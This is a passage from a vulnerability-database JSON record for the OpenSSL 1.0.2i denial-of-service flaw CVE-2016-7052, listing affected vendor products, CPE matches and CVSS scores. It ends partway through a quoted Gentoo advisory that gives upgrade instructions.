"scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.4" }, { "model": "primavera p6 enterprise project portfolio management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "16.1" }, { "model": "netflow generation appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.1(1)" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.13" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.2" }, { "model": "socialminer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.0" }, { "model": "spa112 2-port phone adapter", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance series high-definition ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "40002.9" }, { "model": "intracer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1051.07" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.3" }, { "model": "jabber for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "oss support tools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.8.15.7.15" }, { "model": "communications network charging and control", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.2.0" }, { "model": "prime infrastructure", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.2" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance 4300e and 4500e high-definition ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.9" }, { "model": "computer telephony integration object server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.1" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "11000" }, { "model": "tuxedo", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.1.0" }, { "model": "telepresence sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server on multiparty media and", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3103200" }, { "model": "content security appliance update servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "videoscape anyres live", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.7.2" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99710" }, { "model": "transportation management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.0.2" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.4" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.4.1.9" }, { "model": "universal small cell iuh", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.17.3" }, { "model": "ata analog telephone adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1870" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1.1" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.4" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "500-326.1" }, { "model": "unity express", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10" }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtualization experience media edition", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "vm virtualbox", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "5.1.8" }, { "model": "small business series managed switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3.1" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.6" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10006.1" }, { "model": "telepresence isdn gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32410" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "series smart plus switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2200" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.2.2" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.5.1" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.6" }, { "model": "virtual security gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.5" }, { "model": "telepresence tx9000 series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "series digital media players", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "43000" }, { "model": "telepresence system series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "30006.1" }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70003.4.2.0" }, { "model": "unity connection", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.13" }, { "model": "ucs b-series blade servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "ucs standalone c-series rack server integrated management cont", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "telepresence integrator c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "spectrum control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.9" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3381" }, { "model": "enterprise content delivery system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.6.9" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.1" }, { "model": "mds series multilayer switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000" }, { "model": "series digital media players 5.4.1 rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4300" }, { "model": "ucs standalone c-series rack server integrated management cont", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "-3.0" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.1" }, { "model": "prime network", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence tx9000 series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1" }, { "model": "prime performance manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart net total care local collector appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.12" }, { "model": "connected grid routers", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "15.8.9" }, { "model": "network analysis module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.2" }, { "model": "nexus series fabric switches aci mode", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9000-0" }, { "model": "prime performance manager sp1611", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.7" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.12" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.22" }, { "model": "unified ip phone 9.3 sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6901" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.16" }, { "model": "telepresence server and mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "701087100" }, { "model": "mds series multilayer switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "90006.2.19" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270015.5(3)" }, { "model": "spectrum control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.11" }, { "model": "telepresence server on virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3376" }, { "model": "digital media manager 5.4.1 rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "unified workforce optimization quality management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "telepresence integrator c series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.3" }, { "model": "spa122 analog telephone adapter with router", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.2" }, { "model": "cloud object storage", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.1" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.2" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.14" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3" }, { "model": "unified intelligent contact management enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "application and content networking system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ace application control engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "47100" }, { "model": "oss support tools", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "8.15.17.3.14" }, { "model": "anyconnect secure mobility client for mac os", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "x0" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.4.1.2" }, { "model": "tivoli provisioning manager for images build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20290.1" }, { "model": "prime infrastructure plug and play standalone gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtual security gateway", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.1.6" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50006.2.19" }, { "model": "telepresence conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "application policy infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for mac", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for iphone and ipad", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "prime network registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.0" }, { "model": "primavera p6 enterprise project portfolio management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "16.2" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.1" }, { "model": "telepresence video communication server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x8.8.3" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.4.1" }, { "model": "series digital media players 5.4.1 rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0" }, { "model": "multicast manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.3" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "anyconnect secure mobility client for ios", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "secure access control system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.8.0.32.8" }, { "model": "webex node for mcs", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence mcu", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.5(1.89)" }, { "model": "management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "videoscape anyres live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance ptz ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video distribution suite for internet streaming", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.003(002)" }, { "model": "telepresence server on multiparty media", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8204.4" }, { "model": "telepresence serial gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.3" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.400" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89610" }, { "model": "expressway series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x8.8.3" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.3" }, { "model": "prime network", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "431" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-320" }, { "model": "unified attendant console enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "transportation management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1" }, { "model": "unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.26" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "network analysis module 6.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence system ex series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "prime data center network manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "mxe series media experience engines", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "35000" }, { "model": "universal small cell cloudbase factory recovery root filesystem", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.17.3" }, { "model": "videoscape control suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tandberg codian mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83200" }, { "model": "ip series phones vpn feature", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8800-0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3.0" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.2.0.0" }, { "model": "unified meetingplace 8.6mr1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "email gateway", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "7.6.406-3402.103" }, { "model": "telepresence mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tapi service provider", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70002.9" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-370" }, { "model": "spa525g 5-line ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "secure access control system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified ip conference phone for third-party call control 9.3 sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8831" }, { "model": "unified ip series phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "79000" }, { "model": "spa232d multi-line dect analog telephone adapter", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.2" }, { "model": "nexus series fabric switches aci mode", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000-0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.6" }, { "model": "visual quality experience tools server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtualization experience media edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.3.2" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email gateway 7.6.405h1157986", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.7" }, { "model": "registered envelope service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "universal small cell series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70003.5.12.23" }, { "model": "firesight system software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings client hosted t32", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "unified meetingplace", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "unified contact center express", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "webex meetings server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.6.1.30" }, { "model": "tivoli provisioning manager for images system edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x7.1.1.0" }, { "model": "communications network charging and control", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.4.1.5.0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.402" } ], "sources": [ { "db": "BID", "id": "93171" }, { "db": "JVNDB", "id": "JVNDB-2016-004996" }, { "db": "NVD", "id": "CVE-2016-7052" }, { "db": "CNNVD", "id": "CNNVD-201609-599" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:novell:suse_linux_enterprise_module_for_web_scripting:12.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:-:*:*:*", "cpe_name": [], "versionEndIncluding": "4.1.2", "versionStartIncluding": "4.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:-:*:*:*", "cpe_name": [], "versionEndExcluding": "6.7.0", "versionStartIncluding": "6.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:lts:*:*:*", "cpe_name": [], "versionEndExcluding": "4.6.0", "versionStartIncluding": "4.2.0", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2016-7052" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerabilities that are described in this advisory.", "sources": [ { "db": "CNNVD", "id": "CNNVD-201609-599" } ], "trust": 0.6 }, "cve": "CVE-2016-7052", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 5.0, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2016-7052", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 7.5, "baseSeverity": "High", "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2016-7052", "impactScore": null, "integrityImpact": "None", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2016-7052", "trust": 1.8, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201609-599", "trust": 0.6, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2016-7052", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-7052" }, { "db": "JVNDB", "id": "JVNDB-2016-004996" }, { "db": "NVD", "id": "CVE-2016-7052" }, { "db": "CNNVD", "id": "CNNVD-201609-599" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "crypto/x509/x509_vfy.c in OpenSSL 1.0.2i allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) by triggering a CRL operation. Supplementary information : CWE Vulnerability type by CWE-476: NULL Pointer Dereference (NULL Pointer dereference ) Has been identified. OpenSSL is prone to denial-of-service vulnerability. \nAn attacker may exploit this issue to crash the affected application, resulting in a denial-of-service condition. \n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201612-16\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: OpenSSL: Multiple vulnerabilities\n Date: December 07, 2016\n Bugs: #581234, #585142, #585276, #591454, #592068, #592074,\n #592082, #594500, #595186\n ID: 201612-16\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in OpenSSL, the worst of which\nallows attackers to conduct a time based side-channel attack. \n\nBackground\n==========\n\nOpenSSL is an Open Source toolkit implementing the Secure Sockets Layer\n(SSL v2/v3) and Transport Layer Security (TLS v1) as well as a general\npurpose cryptography library. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 dev-libs/openssl \u003c 1.0.2j \u003e= 1.0.2j\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in OpenSSL. Please review\nthe CVE identifiers and the International Association for Cryptologic\nResearch\u0027s (IACR) paper, \"Make Sure DSA Signing Exponentiations Really\nare Constant-Time\" for further details. Additionally, a time based side-channel\nattack may allow a local attacker to recover a private DSA key. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll OpenSSL users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-libs/openssl-1.0.2j\"\n\nReferences\n==========\n\n[ 1 ] CVE-2016-2105\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2105\n[ 2 ] CVE-2016-2106\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2106\n[ 3 ] CVE-2016-2107\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2107\n[ 4 ] CVE-2016-2108\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2108\n[ 5 ] CVE-2016-2109\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2109\n[ 6 ] CVE-2016-2176\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2176\n[ 7 ] CVE-2016-2177\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2177\n[ 8 ] CVE-2016-2178\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2178\n[ 9 ] CVE-2016-2180\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2180\n[ 10 ] CVE-2016-2183\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2183\n[ 11 ] CVE-2016-6304\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6304\n[ 12 ] CVE-2016-6305\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6305\n[ 13 ] CVE-2016-6306\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6306\n[ 14 ] CVE-2016-7052\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7052\n[ 15 ] Make Sure DSA Signing Exponentiations Really are Constant-Time\n http://eprint.iacr.org/2016/594.pdf\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201612-16\n\nConcerns?\n=========\n\nSecurity 